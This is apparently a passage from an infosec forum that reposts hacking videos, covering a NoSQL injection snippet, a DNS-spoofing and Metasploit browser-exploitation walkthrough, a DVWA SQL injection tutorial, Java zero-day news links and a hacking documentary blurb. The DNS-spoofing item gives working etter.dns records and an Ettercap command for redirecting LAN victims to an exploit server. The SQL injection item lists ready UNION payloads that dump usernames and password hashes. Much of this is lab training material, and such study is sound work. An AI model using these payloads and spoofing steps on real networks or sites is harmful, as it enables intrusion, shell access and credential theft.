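hostile = build_query('{"username": "alice", "password": {"$ne": ""}}')
```

Note that classic SQL escaping does nothing here: no quotes are broken out of, which is why the talk stresses that traditional SQL injection countermeasures don't carry over.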
  21. Dns - Spoof + Browser Exploitation

Description: In this video I will show you how to use Ettercap and Metasploit's browser exploitation module to compromise a machine on the local network without sending the victim any URL. I'm using Ettercap for DNS spoofing and Metasploit for the browser exploitation. Suppose a victim on your network browses to Google, Yahoo, Gmail, or any other website: with the spoofed DNS entries in place, the request is redirected to the attacker's machine. If the victim is running a vulnerable browser, you get a shell; if not, the victim is simply unable to reach those particular sites. Very easy to follow, but a good technique, I think.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Sursa: Dns - Spoof + Browser Exploitation
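As a sketch of the setup described above (the attacker IP 192.168.1.100 and the interface eth0 are assumptions, and the file location varies by distribution), the spoofed records go into Ettercap's etter.dns file and the dns_spoof plugin is loaded during an ARP man-in-the-middle:

```
# etter.dns entries redirecting the spoofed domains to the attacker box
google.com      A   192.168.1.100
*.google.com    A   192.168.1.100
yahoo.com       A   192.168.1.100
*.yahoo.com     A   192.168.1.100

# then run Ettercap with the dns_spoof plugin while ARP-poisoning the LAN:
#   ettercap -T -q -i eth0 -P dns_spoof -M arp // //
```

With a Metasploit browser-exploit module (e.g. browser_autopwn) listening on the attacker IP, any victim whose DNS query is answered with the spoofed record lands on the exploit server without ever being handed a link.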
  22. Dvwa - Blind Sql Injection

Description: In this video I will show you how to use SQL injection queries to extract usernames and password hashes from a database. I'm using DVWA at the low security level. Use Metasploitable 2 for DVWA.

SQL injection queries:

1' and 1=1#
1' and 1=1 order by 2 #
'or' 1=1--
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
1 and 1=0 union select table_name, column_name from information_schema.columns where table_name=0x7573657273

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Sursa: Dvwa - Blind Sql Injection
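To see why these payloads work, here is a sketch of the kind of string concatenation DVWA performs at its low security level (the exact PHP code differs; this Python model only illustrates the mechanics). The leading quote in the payload closes the string literal, `and 1=0` empties the original result set, the `union select` appends attacker-chosen columns, and the trailing `#` comments out the leftover quote.

```python
# Model of the vulnerable query construction: the id parameter is
# concatenated into the SQL string unescaped, so a quote in the input
# rewrites the statement. Table/column names match DVWA's schema.
def build_query(user_id: str) -> str:
    return ("SELECT first_name, last_name FROM users "
            "WHERE user_id = '%s'" % user_id)

# Normal request.
normal = build_query("1")

# One of the UNION payloads from the list above, enumerating table names.
injected = build_query(
    "1' and 1=0 union select null,table_name "
    "from information_schema.tables#")
```

The last payload in the list avoids quotes entirely by encoding the string 'users' as the hex literal 0x7573657273, a common trick when quote characters are filtered.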
  23. Becoming popular: Java Applet JMX Remote Code Execution

Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats: Happy New Year from New Java Zero-Day
Java allows 'open hunting season' for hackers, experts find | ZDNet
Mozilla touts 'Click to Play' in defense against Java vulnerability | ZDNet
  24. [h=1]Web Warriors ~ CBC Documentary[/h]

http://www.youtube.com/watch?feature=player_detailpage&v=34cwMz3HZ8Q

Enter the world of hackers and cyber sleuths. The internet is touted as one of the most important inventions in the history of modern man, and like the discovery of the atom, its ability to benefit mankind is matched only by its potential to unleash massive destruction. Web Warriors is a one-hour documentary that offers an unprecedented glimpse into the world's newest and most vulnerable frontier: cyberspace.

We enter the world of hackers like Mafia Boy - a 15-year-old high school student who rose to infamy in 2000 by causing millions of dollars in damage after single-handedly shutting down internet giants including Yahoo, Amazon, eBay, Dell, eTrade, and CNN. We'll meet hackers like Donnie, who goes on a journey into the Russian cyber underground as he searches for the creators of a computer virus in the hope of collecting the $250,000 bounty being offered by Microsoft.

Just as in nature, computer viruses have rapidly evolved and now have the ability to control millions of computers unbeknownst to their owners, thereby creating massive illegal computer networks known as "Botnets". These "Botnets" are being put to a variety of illicit uses, including identity theft and cyber extortion, but they are also the latest and most potent weapon being deployed in military conflicts. Web Warriors dissects the massive cyber attack against Estonia in 2007, which virtually shut down the country and resulted in NATO deploying its cyber response team.

Web Warriors offers rare interviews with cyber sleuths from the FBI, the Pentagon, NATO, and the Department of Homeland Security, who explain how cyberspace has become the latest battleground between nation states and how terrorist groups are already plotting their next move. Web Warriors offers a fast-paced, never-seen-before glimpse into the cyber trenches of a worldwide battle.
Some reports say the cost of cyber crime is now on par with the illegal drug trade. Web Warriors was produced by Edward Peill for Tell Tale Productions Inc.